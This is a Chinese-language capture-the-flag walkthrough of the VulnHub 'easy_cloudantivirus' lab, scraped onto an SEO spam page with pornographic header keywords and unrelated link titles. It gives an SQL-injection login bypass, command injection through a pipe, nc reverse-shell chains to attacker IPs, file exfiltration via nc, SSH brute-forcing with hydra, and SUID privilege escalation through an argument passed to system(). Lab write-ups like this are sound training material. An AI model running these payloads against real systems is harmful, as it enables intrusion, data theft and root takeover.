中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

什么網(wǎng)站做簡(jiǎn)歷最好app推廣接單網(wǎng)

什么網(wǎng)站做簡(jiǎn)歷最好,app推廣接單網(wǎng),注冊(cè)免費(fèi)的網(wǎng)站,做電商一年能賺多少錢(qián)靶場(chǎng)介紹 靶場(chǎng)名:easy_cloudantivirus 靶場(chǎng)地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453 環(huán)境搭建 依舊使用VM VirtualBox搭建靶場(chǎng),攻擊機(jī)使用的是VMware中的kali,需要將VMware虛擬機(jī)kali和virtualbox靶機(jī)…

靶場(chǎng)介紹

靶場(chǎng)名:easy_cloudantivirus
靶場(chǎng)地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453

環(huán)境搭建

依舊使用VM VirtualBox搭建靶場(chǎng),攻擊機(jī)使用的是VMware中的kali,需要將VMware虛擬機(jī)kali和virtualbox靶機(jī)網(wǎng)絡(luò)連接設(shè)置,參考鏈接如下:
https://blog.csdn.net/xujj10086/article/details/123836792

靶場(chǎng)練習(xí)

掃ip,掃端口

arp-scan -l

在這里插入圖片描述

nmap -sS 192.168.0.4

在這里插入圖片描述

利用sql注入萬(wàn)能密碼登錄

訪問(wèn)8080端口服務(wù)
在這里插入圖片描述
在這里插入圖片描述
網(wǎng)站是一個(gè)病毒掃描器,需要輸入邀請(qǐng)碼。
第一思路是使用萬(wàn)能密碼嘗試能否進(jìn)入,于是使用burp進(jìn)行抓包爆破,爆破出了可以登錄進(jìn)去的萬(wàn)能密碼:
在這里插入圖片描述
在這里插入圖片描述
萬(wàn)能密碼為:

  "or"a"="a

萬(wàn)能密碼的原理是利用sql注入,這里是使用雙引號(hào)對(duì)sql語(yǔ)句進(jìn)行了閉合,才能進(jìn)入系統(tǒng)。輸入萬(wàn)能密碼后進(jìn)入頁(yè)面
在這里插入圖片描述
在這里插入圖片描述

利用命令執(zhí)行漏洞反彈shell

提示說(shuō)嘗試使用掃描器掃描其中的文件,那么我們輸入hello試試:
在這里插入圖片描述
返回了掃描的結(jié)果,這里我們判斷我們輸入hello后應(yīng)該是后臺(tái)會(huì)拼接上命令,我們可以嘗試拼接命令看是否會(huì)被執(zhí)行,通常會(huì)使用管道符|
輸入

hello|id

成功返回了id的執(zhí)行結(jié)果,說(shuō)明此處存在命令執(zhí)行漏洞
在這里插入圖片描述

kali開(kāi)啟監(jiān)聽(tīng),使用nc進(jìn)行反彈shell

hello|nc -nv 192.168.0.3 2333 -e /bin/bash

發(fā)現(xiàn)沒(méi)有反彈成功,查看wp發(fā)現(xiàn)是因?yàn)榘袌?chǎng)環(huán)境中的nc沒(méi)有-e參數(shù)
輸入

hello|nc 192.168.0.5 2233|/bin/bash|nc -nv 192.168.0.5 4444
這里kali需要同時(shí)開(kāi)啟2233和4444端口
我們?cè)?233端口輸入的語(yǔ)句會(huì)在靶機(jī)中輸入到bash環(huán)境中執(zhí)行,再將執(zhí)行的結(jié)果返回到kali的4444端口中

如圖所示,我們?cè)?233處輸入ls,命令執(zhí)行的結(jié)果會(huì)在4444處返回
在這里插入圖片描述

下載sql文件并進(jìn)行讀取

這里發(fā)現(xiàn)一個(gè)后綴名是sql的文件
通過(guò)nc命令將這個(gè)文件下載到kali里:
先在kali里開(kāi)啟監(jiān)聽(tīng):

nc -lvvp 5555 > db.sql
然后在可以執(zhí)行的命令框中執(zhí)行以下命令:
nc -nv 192.168.0.5 5555 <database.sql
如圖所示,就已經(jīng)收到這個(gè)文件了:
在這里插入圖片描述

使用sqlite3嘗試讀取文件內(nèi)容,讀到了幾個(gè)密碼
在這里插入圖片描述

使用hydra嘗試爆破ssh

由于靶機(jī)開(kāi)啟了22端口,我們嘗試找到有bash環(huán)境的用戶(hù)進(jìn)行密碼爆破
通過(guò)讀取 /etc/passwd文件,我們找到了三個(gè)有bash環(huán)境的用戶(hù)
在這里插入圖片描述
使用在第一次靶場(chǎng)中使用過(guò)的hydra進(jìn)行爆破,需要制作用戶(hù)名和密碼的字典,結(jié)果如下:
在這里插入圖片描述
沒(méi)有跑出來(lái)可以登錄的賬號(hào)密碼,說(shuō)明這條路走不通了,需要再看下別的地方。

繼續(xù)進(jìn)行信息收集

繼續(xù)進(jìn)行信息收集:
我們?cè)谏弦患?jí)目錄中發(fā)現(xiàn)了update_cloudav和update_cloudav.c文件
在這里插入圖片描述
查看詳細(xì)的文件屬性,發(fā)現(xiàn)update_cloudav文件屬于root,也就是說(shuō)這個(gè)文件有suid權(quán)限,所屬組是scanner,使用whoami看到我們當(dāng)前的用戶(hù)也是scanner,也就是說(shuō)我們有這個(gè)文件的執(zhí)行權(quán)限
在這里插入圖片描述

suid提權(quán)

這里我們可以想到update_cloudav.c就是這個(gè)可執(zhí)行文文件的C語(yǔ)言源碼,我們讀取一下源文件:
在這里插入圖片描述
可以看到內(nèi)容就是執(zhí)行病毒庫(kù)的更新程序并且要求我們?cè)趫?zhí)行文件的時(shí)候帶一個(gè)參數(shù)(倒數(shù)第六行),帶的參數(shù)也會(huì)放到system函數(shù)中執(zhí)行,那我們就嘗試讓我們的參數(shù)是反彈shell的命令即可:
先在kali開(kāi)啟兩個(gè)端口的監(jiān)聽(tīng),然后在執(zhí)行命令的窗口執(zhí)行下面的命令,要注意執(zhí)行命令的路徑要在update_cloudav文件所在的目錄下

./update_cloudav “a |nc 192.168.0.5 6666|/bin/bash|nc 192.168.0.5 7777”

在這里插入圖片描述
成功獲得root權(quán)限!

后記

1.當(dāng)nc命令帶上-e參數(shù)無(wú)法執(zhí)行時(shí),可以先嘗試一下不帶參數(shù)的nc命令能否執(zhí)行,可以執(zhí)行的話就證明確實(shí)是靶機(jī)中的nc沒(méi)有-e參數(shù),就可以采用下面這種方法進(jìn)行反彈shell

nc 192.168.0.5 2233|/bin/bash|nc -nv 192.168.0.5 4444

我們?cè)?233端口輸入的語(yǔ)句會(huì)在靶機(jī)中輸入到bash環(huán)境中執(zhí)行,再將執(zhí)行的結(jié)果返回到kali的4444端口中。(當(dāng)然這里針對(duì)nc沒(méi)有-e參數(shù)還可以使用命名管道符進(jìn)行反彈shell)

2.獲取到shell后,要進(jìn)行詳細(xì)的信息收集,根據(jù)能收集到的所有信息,判斷哪些文件可以幫助我們進(jìn)行提權(quán)。像這個(gè)靶場(chǎng)中的update_cloudav文件,當(dāng)然也需要有代碼審計(jì)能力,這方面我還比較弱,是直接照著wp來(lái)的。

最后附上大佬的文章:
https://mp.weixin.qq.com/s?__biz=Mzg5MDY2MTUyMA==&mid=2247489706&idx=1&sn=91f7428304d36f0aea38750b1fbdb587&chksm=cfd86755f8afee43a58eb21f5c00a489841874a7970a3a88764352e19bd8f39fb1eb86687ba2&scene=178&cur_album_id=2923844073592012805#rd

http://www.risenshineclean.com/news/2498.html

相關(guān)文章:

  • 創(chuàng)新的沈陽(yáng)網(wǎng)站建設(shè)百度指數(shù)的功能
  • 最新新聞國(guó)際新聞seo標(biāo)題優(yōu)化關(guān)鍵詞怎么選
  • 無(wú)錫中小企業(yè)網(wǎng)站制作推廣方式有哪些?
  • 深圳商務(wù)網(wǎng)站建設(shè)怎么建立公司網(wǎng)站
  • 徐州 網(wǎng)站建設(shè)百度一下 你就知道官網(wǎng)
  • 網(wǎng)站管理模式aso推廣公司
  • 總做總結(jié) 網(wǎng)站維護(hù)的收獲站長(zhǎng)之家網(wǎng)站查詢(xún)
  • 甘肅企業(yè)模板建站信息seo專(zhuān)員是干什么的
  • 營(yíng)銷(xiāo)式網(wǎng)站制作鄭州網(wǎng)站建設(shè)公司
  • 免費(fèi)提供網(wǎng)站建設(shè)免費(fèi)二級(jí)域名分發(fā)平臺(tái)
  • 云南做網(wǎng)站多少錢(qián)軟文營(yíng)銷(xiāo)文案
  • 用帝國(guó)cms系統(tǒng)怎么做網(wǎng)站b2b是什么意思
  • 有沒(méi)有專(zhuān)門(mén)做化妝品小樣的網(wǎng)站百度新聞網(wǎng)頁(yè)
  • 中國(guó)新聞社級(jí)別桌子seo關(guān)鍵詞
  • 鄭州購(gòu)物網(wǎng)站建設(shè)寫(xiě)軟文怎么接單子
  • 網(wǎng)站沒(méi)有備案會(huì)怎么樣百度最新財(cái)報(bào)
  • 網(wǎng)站建設(shè)800元全包seo優(yōu)化排名工具
  • 網(wǎng)站建設(shè)與品牌策劃方案報(bào)價(jià)國(guó)際形勢(shì)最新消息
  • 深圳專(zhuān)業(yè)o2o網(wǎng)站設(shè)計(jì)公司長(zhǎng)春seo整站優(yōu)化
  • 福建城鄉(xiāng)建設(shè)部網(wǎng)站首頁(yè)競(jìng)價(jià)培訓(xùn)班
  • 紹興公司企業(yè)名單武漢seo優(yōu)化代理
  • 做汽車(chē)行業(yè)必須注冊(cè)際零件網(wǎng)站必應(yīng)搜索國(guó)際版
  • 邢臺(tái)商城類(lèi)網(wǎng)站建設(shè)企業(yè)qq郵箱
  • 百度指數(shù)的網(wǎng)站谷歌搜索入口365
  • 網(wǎng)站制作的公司哪個(gè)好南寧seo營(yíng)銷(xiāo)推廣
  • 長(zhǎng)沙哪個(gè)網(wǎng)站建設(shè)最好重慶可靠的關(guān)鍵詞優(yōu)化研發(fā)
  • 網(wǎng)站開(kāi)發(fā)常用的谷歌插件女教師遭網(wǎng)課入侵視頻大全播放
  • 高密市政府建設(shè)局網(wǎng)站臺(tái)州網(wǎng)站制作維護(hù)
  • 汕頭市門(mén)戶(hù)網(wǎng)站建設(shè)屬性詞 關(guān)鍵詞 核心詞
  • 深圳軟件有限公司企業(yè)網(wǎng)站優(yōu)化關(guān)鍵詞